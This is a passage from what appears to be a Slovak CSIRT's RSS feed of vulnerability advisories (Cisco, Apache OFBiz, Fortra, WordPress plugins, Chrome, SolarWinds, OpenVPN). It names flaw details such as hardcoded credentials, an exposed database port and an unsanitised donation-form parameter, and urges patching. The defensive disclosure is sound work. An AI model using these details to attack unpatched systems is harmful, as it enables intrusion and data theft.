<p>Spoločnosť Cisco opravila dve kritické zraniteľnosti v nástroji Smart Licensing Utility. Aby bolo možné ich zneužiť, musí aplikácia bežať.<br><br><strong>CVE-2024-20439</strong> (CVSSv3 skóre 9,8)<br><br>Zraniteľnosť CVE-2024-20439 súvisí s implementovanými statickými prihlasovacími údajmi pre administrátorský účet. Útočník ich môže zneužiť pre získanie neautorizovaného prístupu do systému.<br><br><strong>CVE-2024-20440</strong> (CVSSv3 skóre 9,8)<br><br>Zraniteľnosť CVE-2024-20440 umožňuje útočníkovi pomocou špeciálnych HTTP požiadaviek získať logovacie súbory obsahujúce citlivé údaje, vrátane prihlasovacích údajov pre prístup k API rozhraniu aplikácie. Súvisí s ukladaním citlivých informácií do súboru debug logu.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Kompromitácia aplikácie</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia na Cisco Smart License Utility 2.3.0.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://thehackernews.com/2024/09/cisco-fixes-two-critical-flaws-in-smart.html">https://thehackernews.com/2024/09/cisco-fixes-two-critical-flaws-in-smart.html</a></li>



<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cslu-7gHMzWmw">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cslu-7gHMzWmw</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1329/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v Apache Open For Business</title>
		<link>/posts/1321</link>
					<comments>/posts/1321#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 06 Sep 2024 14:47:01 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1321</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/Apache-OFBiz-1024x579.jpg" alt="" /></p>V aplikácii Apache Open For Business bola opravená kritická zraniteľnosť umožňujúca vzdialené vykonávanie kódu bez potreby autentifikácie. Súvisí s nedostatočným overením oprávnení...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/Apache-OFBiz-1024x579.jpg" alt="" /></p>
<p><strong>V aplikácii Apache Open For Business bola opravená kritická zraniteľnosť umožňujúca vzdialené vykonávanie kódu bez potreby autentifikácie. Súvisí s nedostatočným overením oprávnení používateľa, ktorý sa pokúša priamo pristúpiť ku chráneným zdrojom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Apache OFBiz verzie staršie ako 18.12.16</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-45195</strong> (CVSSv3 skóre 7,5)<br><br>Apache opravil kritickú zraniteľnosť v open-source aplikácii OFBiz (Open For Business). Zraniteľnosť CVE-2024-45195 súvisí s nedostatočnou kontrolou oprávnení pre zabezpečené zdroje, čo umožňuje získať k nim prístup priamou požiadavkou. Neautentifikovanému útočníkovi umožňuje vzdialene vykonávať kód na serveri.<br><br>Zraniteľnosť obchádza opravu troch predchádzajúcich, ktoré vychádzajú z tej istej chyby (CVE-2024-32113, CVE-2024-36104, CVE-2024-38856). Objavili ju výskumníci spoločnosti Rapid7.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia na Apache OFBiz 18.12.16.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.bleepingcomputer.com/news/security/apache-fixes-critical-ofbiz-remote-code-execution-vulnerability/">https://www.bleepingcomputer.com/news/security/apache-fixes-critical-ofbiz-remote-code-execution-vulnerability/</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45195">https://nvd.nist.gov/vuln/detail/CVE-2024-45195</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1321/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností august 2024</title>
		<link>/posts/1306</link>
					<comments>/posts/1306#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 03 Sep 2024 15:14:59 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=1306</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci august 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci august 2024.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/09/2024_08_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/09/2024_08_mesacnik.pdf">Mesačný prehľad – 08/2024 PDF (667 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softverovych-zranitelnosti" data-type="link" data-id="https://www.csirt.gov.sk/mesacny-prehlad-kritickych-a-zavaznych-softverovych-zranitelnosti.html?csrt=4087702320029811072">tomto odkaze</a>.</p>



<p></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1306/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť FORTRA FileCatalyst Workflow</title>
		<link>/posts/1288</link>
					<comments>/posts/1288#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 30 Aug 2024 11:06:32 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Fortra]]></category>
		<guid isPermaLink="false">/?p=1288</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/08/fortra_esbd-469x352-1.jpg" alt="" /></p>Fortra FileCatalyst Workflow obsahuje kritickú zraniteľnosť, ktorá umožňuje vzdialeným útočníkom administrátorský prístup ku prednastavenej databáze softvéru, čím môžu získať úplnú...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/08/fortra_esbd-469x352-1.jpg" alt="" /></p>
<p><strong>Fortra FileCatalyst Workflow obsahuje kritickú zraniteľnosť, ktorá umožňuje vzdialeným útočníkom administrátorský prístup ku prednastavenej databáze softvéru, čím môžu získať úplnú kontrolu nad zraniteľnou webovou aplikáciou.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<p>FileCatalyst Workflow 5.1.6 Build 139 a staršie</p>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-6633</strong> (CVSS skóre 9,8)</p>



<p><p class="MsoNormal"><span style="mso-bidi-font-weight:bold">Kritická zraniteľnosť </span>FileCatalyst Workflow umožňuje kvôli prednastaveným prihlasovacím údajom pre konfiguráciu databázy HSQL, zverejneným na webstránkach spoločnosti Fortra, získať vzdialenému útočníkovi administratívny prístup k nej. Následne si v nej môžu napríklad vytvoriť konto pre webovú aplikáciu s administrátorskými oprávneniami. Štandardne je databáza prístupná na TCP porte 4406.</p><p class="MsoNormal">Spoločnosť túto databázu odporúča používať len v rámci inštalácie softvéru a následne prepojiť produkčnú inštanciu softvéru s inou databázou, na to určenou. Používatelia však toto odporúčanie v niektorých prípadoch ignorujú.</p>Zraniteľnosť objavili výskumníci zo spoločnosti Tenable.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Získanie kontroly nad zraniteľnou databázou</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia FileCatalyst Workflow na verziu 5.1.7 alebo novšiu.<br>Pre mitigáciu zraniteľnosti nepoužívajte v produkčnej inštalácii FileCatalyst Workflow prednastavenú databázu. Pripojte k nej inú databázu.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.fortra.com/security/advisories/product-security/fi-2024-011 ">https://www.fortra.com/security/advisories/product-security/fi-2024-011 </a></li>



<li><a href="https://thehackernews.com/2024/08/fortra-issues-patch-for-high-risk.html ">https://thehackernews.com/2024/08/fortra-issues-patch-for-high-risk.html </a></li>



<li><a href="https://www.helpnetsecurity.com/2024/08/28/cve-2024-6633/?web_view=true">https://www.helpnetsecurity.com/2024/08/28/cve-2024-6633/?web_view=true</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1288/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v doplnku WordPress WPML</title>
		<link>/posts/1284</link>
					<comments>/posts/1284#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 30 Aug 2024 10:58:49 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">/?p=1284</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/WordPress_blue_logo.svg-min-1024x822.png" alt="" /></p>Vývojári populárneho doplnku WordPress WPML slúžiaceho na vytváranie viacjazyčných stránok vydali bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť. Zraniteľnosť s označením CVE-2024-6386...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/WordPress_blue_logo.svg-min-1024x822.png" alt="" /></p>
<p><strong>Vývojári populárneho doplnku WordPress WPML slúžiaceho na vytváranie viacjazyčných stránok vydali bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť. Zraniteľnosť s označením CVE-2024-6386 umožňuje vykonanie škodlivého kódu a získanie úplnej kontroly nad inštanciou redakčného systému WordPress.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>WordPress doplnok WPML vo verzii staršej ako 4.6.13</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-6386</strong> (CVSS skóre 9,9)</p>



<p>Zraniteľnosť spočíva v nedostatočnom overovaní používateľských vstupov v rámci šablón Twig a vzdialený autentifikovaný útočník s oprávneniami Contributor by ich mohol zneužiť na realizáciu útokov SSTI (Server Side Template Injection) vedúcich k vykonaniu škodlivého kódu. Na uvedenú zraniteľnosť je v súčasnosti verejne dostupný proof-of-concept kód demonštrujúci návod na jej zneužitie.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li> Vykonanie škodlivého kódu<span style="mso-fareast-font-family:&quot;Times New Roman&quot;;
     mso-bidi-font-family:Calibri;mso-bidi-theme-font:minor-latin;mso-fareast-language:
     SK"></span> </li>



<li>Získanie úplnej kontroly nad systémom</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame bezodkladnú aktualizáciu doplnku WPML na verziu 4.6.13 a novšiu. V rámci preventívnych opatrení odporúčame pravidelnú aktualizáciu redakčného systému a všetkých používaných pluginov.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.securityweek.com/code-execution-vulnerability-found-in-wpml-plugin-installed-on-1m-wordpress-sites/">https://www.securityweek.com/code-execution-vulnerability-found-in-wpml-plugin-installed-on-1m-wordpress-sites/</a></li>



<li><a href="https://www.wordfence.com/blog/2024/08/1000000-wordpress-sites-protected-against-unique-remote-code-execution-vulnerability-in-wpml-wordpress-plugin/">https://www.wordfence.com/blog/2024/08/1000000-wordpress-sites-protected-against-unique-remote-code-execution-vulnerability-in-wpml-wordpress-plugin/</a></li>



<li><a href="https://sec.stealthcopter.com/wpml-rce-via-twig-ssti/">https://sec.stealthcopter.com/wpml-rce-via-twig-ssti/</a></li>



<li><a href="https://www.securityweek.com/code-execution-vulnerability-found-in-wpml-plugin-installed-on-1m-wordpress-sites/">https://www.securityweek.com/code-execution-vulnerability-found-in-wpml-plugin-installed-on-1m-wordpress-sites/</a></li>
</ul>



<p></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1284/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zraniteľnosť v Google Chrome</title>
		<link>/posts/1282</link>
					<comments>/posts/1282#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 27 Aug 2024 09:07:10 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1282</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>Spoločnosť Google vydala bezpečnostné aktualizácie na svoj webový prehliadač Chrome, ktoré opravujú 19 zraniteľností. Najzávažnejšie zraniteľnosti v&#160;komponentoch V8, Passwords, Skia,...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>
<p><strong>Spoločnosť Google vydala bezpečnostné aktualizácie na svoj webový prehliadač Chrome, ktoré opravujú 19 zraniteľností. Najzávažnejšie zraniteľnosti v&nbsp;komponentoch V8, Passwords, Skia, Fonts a&nbsp;Autofill možno zneužiť umožňujú vzdialené vykonanie kódu a&nbsp;zneprístupnenie služby. Zraniteľnosť s&nbsp;označením CVE-2024-7965 je aktívne zneužívaná útočníkmi.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Google Chrome pre Windows a Mac verzie staršej ako 128.0.6613.84/.85</li>



<li>Google Chrome pre Linux verzie staršej ako 128.0.6613.84</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-7971 </strong>(CVSS skóre 8.8) a <strong>CVE-2024-7965</strong> (CVSS skóre 6.5)</p>



<p>Nesprávna implementácia bezpečnostných mechanizmov (CVE-2024-7965) a&nbsp;nesprávne vyhodnocovanie typov (CVE-2024-7971) v&nbsp;komponente V8 by vzdialený neautentifikovaný útočník prostredníctvom podvrhnutia špeciálne vytvoreného webového obsahu mohol zneužiť na obídenie bezpečnostných prvkov a&nbsp;vykonanie škodlivého kódu. Na obe zraniteľnosti je v&nbsp;súčasnosti dostupný proof-of-concept kód demonštrujúci návod na ich zneužitie. <strong>Zraniteľnosť s&nbsp;označením CVE-2024-7965 je podľa spoločnosti Google aktívne zneužívaná útočníkmi.</strong></p>



<p><strong>CVE-2024-7964, CVE-2024-7968</strong> (CVSS skóre 8.8)</p>



<p>Zraniteľnosti v&nbsp;komponentoch Passwords a&nbsp;Autofill spočívajú v&nbsp;použití odalokovaného miesta v&nbsp;pamäti a&nbsp;možno ich zneužiť vzdialené vykonanie škodlivého kódu.</p>



<p><strong>CVE-2024-7966</strong> (CVSS skóre 8.8)</p>



<p>Komponent Skia obsahuje zraniteľnosť umožňujúcu prístup k obsahu pamäti mimo povolených hodnôt, ktorá umožňuje <strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong>CVE-2024-7967</strong> (CVSS skóre 8.8)</p>



<p>Pretečením zásobníka haldy v&nbsp;komponente Fonts možno spôsobiť pád prehliadača alebo vykonať škodlivý kód.</p>



<p><strong>Zneužitie všetkých vyššie uvedených zraniteľností vyžaduje interakciu zo strany používateľa, ktorý musí otvoriť špeciálne vytvorený webový obsah.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonanie škodlivého kódu</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>



<li><strong>Obídenie bezpečnostných prvkov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Odporúčame aktualizáciu prehliadača Chrome pre Windows a Mac aspoň na verziu 128.0.6613.84/.85 a Linux verzie aspoň na verziu 128.0.6613.84.</strong></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html">https://chromereleases.googleblog.com/2024/08/stable-channel-update-for-desktop_21.html</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/351758">https://exchange.xforce.ibmcloud.com/vulnerabilities/351758</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/351752">https://exchange.xforce.ibmcloud.com/vulnerabilities/351752</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/351762">https://exchange.xforce.ibmcloud.com/vulnerabilities/351762</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/351759">https://exchange.xforce.ibmcloud.com/vulnerabilities/351759</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/351764">https://exchange.xforce.ibmcloud.com/vulnerabilities/351764</a></li>



<li><a href="https://exchange.xforce.ibmcloud.com/vulnerabilities/351756">https://exchange.xforce.ibmcloud.com/vulnerabilities/351756</a></li>



<li><a href="https://thehackernews.com/2024/08/google-warns-of-cve-2024-7965-chrome.html">https://thehackernews.com/2024/08/google-warns-of-cve-2024-7965-chrome.html</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/google-tags-a-tenth-chrome-zero-day-as-exploited-this-year/">https://www.bleepingcomputer.com/news/security/google-tags-a-tenth-chrome-zero-day-as-exploited-this-year/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1282/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v produkte SolarWinds</title>
		<link>/posts/1250</link>
					<comments>/posts/1250#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 23 Aug 2024 13:08:46 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Solarwinds]]></category>
		<guid isPermaLink="false">/?p=1250</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/08/download.png" alt="" /></p>Spoločnosť SolarWinds vydala bezpečnostné aktualizácie pre službu Web Help Desk (WHD), ktoré opravujú kritické zraniteľnosti s&#160;označením CVE-2024-28986 a CVE-2024-228987. Vzdialený...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/08/download.png" alt="" /></p>
<p><strong>Spoločnosť SolarWinds vydala bezpečnostné aktualizácie pre službu Web Help Desk (WHD), ktoré opravujú kritické zraniteľnosti s&nbsp;označením CVE-2024-28986 a CVE-2024-228987. Vzdialený útočník ich</strong> <strong>môže zneužiť na vzdialené vykonávanie kódu a neoprávnený prístup do systému.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>WHD 12.4;</li>



<li>WHD 12.5;</li>



<li>WHD 12.6;</li>



<li>WHD 12.7;</li>



<li>WHD 12.8</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-28986 </strong>(CVSS skóre 9,8)</p>



<p><strong>Kritická zraniteľnosť</strong> CVE-2024-28986 bola objavená v&nbsp;službe <strong>Web Help Desk</strong> a&nbsp;umožňuje <strong>vzdialené vykonávanie kódu</strong>. Chyba súvisí s&nbsp;deseralizáciou jazyka Java a&nbsp;umožňuje neautentifikovanému útočníkovi spustiť príkazy na zraniteľnom hostiteľskom počítači. </p>



<p>Deserializácia je proces transformácie uložených dát do objektov, s ktorými dokáže program pracovať.</p>



<p>Spoločnosť SolarWinds uvádza, že CVE-2024-28986 bola nahlásená ako zraniteľnosť, ktorú bolo možné zneužiť bez potreby autentifikácie, ale jej inžinieri ju dokázali reprodukovať až po autentifikácii.</p>



<p>Zraniteľnosť CVE-2024-28986<strong> je aktívne zneužívaná. </strong></p>



<p><strong>CVE-2024-28986</strong> (CVSS skóre 9,1)</p>



<p>Druhá kritická zraniteľnosť spočíva v existencii <strong>zabudovaných používateľských účtov s predvoleným heslom</strong>, ktoré by vzdialený neautentifikovaný útočník mohol zneužiť na <strong>získanie neoprávneného prístupu</strong> do systému a následne využiť interné funkcionality nástroja a modifikovať dáta.</p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Neoprávnený prístup do systému</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Výrobca odporúča vykonať bezodkladnú aktualizáciu WHD na verziu 12.8.3 a&nbsp;následnú inštaláciu hotfixov HF1 a HF2. Nakoľko počas aplikovania hotfixov dochádza k&nbsp;modifikácii súborov, SolarWinds odporúča vytvoriť záložné kópie pôvodných súborov, aby sa predišlo prípadným problémom v prípade, že hotfixy neboli aplikované správne. </strong>Celý postup nájdete <a href="https://support.solarwinds.com/SuccessCenter/s/article/WHD-12-8-3-Hotfix-1"><strong>tu</strong></a> a <a href="https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2" data-type="link" data-id="https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2"><strong>tu</strong></a>.</p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://www.bleepingcomputer.com/news/security/solarwinds-fixes-critical-rce-bug-affecting-all-web-help-desk-versions/">https://www.bleepingcomputer.com/news/security/solarwinds-fixes-critical-rce-bug-affecting-all-web-help-desk-versions/</a><br><br><a href="https://support.solarwinds.com/SuccessCenter/s/article/WHD-12-8-3-Hotfix-1">https://support.solarwinds.com/SuccessCenter/s/article/WHD-12-8-3-Hotfix-1</a><br><br><a href="https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2">https://support.solarwinds.com/SuccessCenter/s/article/SolarWinds-Web-Help-Desk-12-8-3-Hotfix-2</a><br><br><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-28986">https://nvd.nist.gov/vuln/detail/CVE-2024-28986</a><br><br><a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987">https://www.solarwinds.com/trust-center/security-advisories/cve-2024-28987</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1250/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v module WordPress GiveWP</title>
		<link>/posts/1276</link>
					<comments>/posts/1276#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 23 Aug 2024 12:53:26 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">/?p=1276</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/08/wp-give-hd.jpg" alt="" /></p>Modul WordPress GiveWP, ktorý poskytuje možnosť vytvorenia darcovského rozhrania na webstránkach, obsahuje kritickú zraniteľnosť súvisiacu s nedostatočným overovaním používateľských vstupov. Jej...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/08/wp-give-hd.jpg" alt="" /></p>
<p><strong>Modul WordPress GiveWP, ktorý poskytuje možnosť vytvorenia darcovského rozhrania na webstránkach, obsahuje kritickú zraniteľnosť súvisiacu s nedostatočným overovaním používateľských vstupov. Jej zneužitím dokáže útočník vzdialene vykonávať kód a mazať súbory. Môže získať úplnú kontrolu nad zraniteľnou inštanciou WordPress.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<p>WordPress GiveWP, verzia 3.14.1 a staršie</p>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-5932</strong> (CVSS v 3.1 skóre 10,0)<br><br>GiveWP je modul, ktorý predstavuje riešenie pre vytvorenie darcovskej služby na weboch postavených na redakčnom systéme WordPress. Vývojári pluginu vydali bezpečnostné aktualizácie, ktoré opravujú kritickú bezpečnostnú zraniteľnosť. CVE-2024-5932 by vzdialený neautentifikovaný útočník prostredníctvom deserializácie obsahu parametra give_title mohol zneužiť na vzdialené vykonanie kódu alebo odstránenie ľubovoľných súborov. Problém sa nachádza vo funkcii pre kontrolu používateľských vstupov z darcovského formulára give_process_donation_form(), ktorá parameter give_title vynecháva z validácie a sanitizácie. Útočník tak dokáže cez formulár injektovať objekt PHP. V prípade vymazania konfiguračného súboru wpconfig.php by útočník mohol získať úplnú kontrolu nad systémom.</p>



<p><strong>Závažnosť zraniteľnosti:</strong> Vysoká</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Vzdialené vykonávanie kódu </li>



<li>Získanie kontroly nad zraniteľným systémom </li>



<li>Únik citlivých informácií</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia GiveWP aspoň na verziu 3.14.2.</p>



<p><strong>Odkazy:</strong></p>



<p><p class="MsoNormal"><a href="https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin/">https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin/</a></p><p class="MsoNormal"><a href="https://thehackernews.com/2024/08/givewp-wordpress-plugin-vulnerability.html">https://thehackernews.com/2024/08/givewp-wordpress-plugin-vulnerability.html</a></p><a href="https://feedly.com/cve/CVE-2024-5932">https://feedly.com/cve/CVE-2024-5932</a><br></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1276/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Viete čo je OSINT? [Infografika]</title>
		<link>/posts/1258</link>
					<comments>/posts/1258#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 16 Aug 2024 09:07:30 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Infografika]]></category>
		<category><![CDATA[OSINT]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=1258</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>Pripravili sme si pre Vás infografiku o Open Source Intelligence (OSINT). OSINT predstavuje kľúčový nástroj na získavanie a overovanie informácií...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>
<p>Pripravili sme si pre Vás infografiku o Open Source Intelligence (OSINT). OSINT predstavuje kľúčový nástroj na získavanie a overovanie informácií z verejne dostupných zdrojov, čo hrá dôležitú úlohu nielen v investigatívnej práci, ale aj v oblasti kybernetickej bezpečnosti. Viete, aké sú hlavné výhody OSINT a aké výzvy môže priniesť?</p>



<p><em><strong><a href="https://csirt.sk/wp-content/uploads/2024/08/Infografika_OSINT-1200x2400-1.pdf" data-type="link" data-id="/wp-content/uploads/2024/08/Infografika_OSINT-1200x2400-1.pdf">Infografika- OSINT</a></strong> (PDF)</em></p>



<p>Všetky naše infografiky si môžete pozrieť <a href="https://csirt.sk/infografiky" data-type="link" data-id="/infografiky"><strong>tu.</strong></a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1258/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Microsoft odhalil bezpečnostné zraniteľnosti v OpenVPN</title>
		<link>/posts/1253</link>
					<comments>/posts/1253#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 16 Aug 2024 08:28:06 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1253</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/08/download-1.png" alt="" /></p>Bezpečnostní výskumníci zo spoločnosti Microsoft na hackerskej konferencii Black Hat USA 2024 zverejnili informácie o&#160;4 zraniteľnostiach OpenVPN, ktorých zreťazením by...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/08/download-1.png" alt="" /></p>
<p><strong>Bezpečnostní výskumníci zo spoločnosti Microsoft na hackerskej konferencii Black Hat USA 2024 zverejnili informácie o&nbsp;4 zraniteľnostiach OpenVPN, ktorých zreťazením by vzdialený útočník mohol získať úplnú kontrolu nad systémom. Vývojári OpenVPN zraniteľnosti opravili ešte v&nbsp;marci 2024 vydaním verzie 2.6.10.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>OpenVPN vo verzii staršej ako 2.6.10 (aktuálna verzia 2.6.12)</li>
</ul>



